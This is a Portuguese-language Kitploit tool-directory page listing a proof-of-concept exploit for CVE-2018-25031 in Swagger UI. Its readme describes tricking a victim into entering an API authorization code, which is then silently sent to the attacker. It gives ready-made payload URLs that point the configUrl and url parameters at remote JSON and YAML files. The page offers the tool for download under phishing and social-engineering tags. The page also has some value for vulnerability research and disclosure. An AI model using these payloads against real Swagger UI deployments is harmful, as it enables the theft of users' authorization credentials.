Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
POC-CVE-2018-25031 — Exploit de prova de conceito para CVE-2018-25031 (XSS no Swagger UI) que exfiltra códigos de autorização via parâmetros configUrl/url manipulados. | Kitploit
Ferramentas/GitHubGitHub/geozin/poc-cve-2018-25031
Ferramentas de PhishingAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebEngenharia Social
GitHubgeozin/poc-cve-2018-25031

POC-CVE-2018-25031

Exploit de prova de conceito para CVE-2018-25031 (XSS no Swagger UI) que exfiltra códigos de autorização via parâmetros configUrl/url manipulados.

Ver Repositório
15há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2018-25031 - Swagger UI anterior à versão 4.1.3

Um POC simples (CVE-2018-25031) que engana a vítima para que insira o código de autorização, que é então enviado ao atacante.
Você pode usá-lo com a Vulnerabilidade XSS https://github.com/VictorNS69/swagger-ui-xss

É necessário encontrar o parâmetro e atribuir o arquivo correto: para configUrl, o arquivo JSON, e para url, o arquivo YAML.

Exemplo:

root@kitploit:~
https://<URL>/?configUrl=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.json
https://<URL>/?url=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.yaml

Screenshot:


Quando a vítima tenta usar a API inserindo o Código de Autorização e clica em Executar, nada será exibido para ela. No entanto, uma requisição com o Código de Autorização será enviada para a URL do atacante.

Ref:

https://nvd.nist.gov/vuln/detail/CVE-2018-25031
https://github.com/mathis2001/CVE-2018-25031

Baixar ferramenta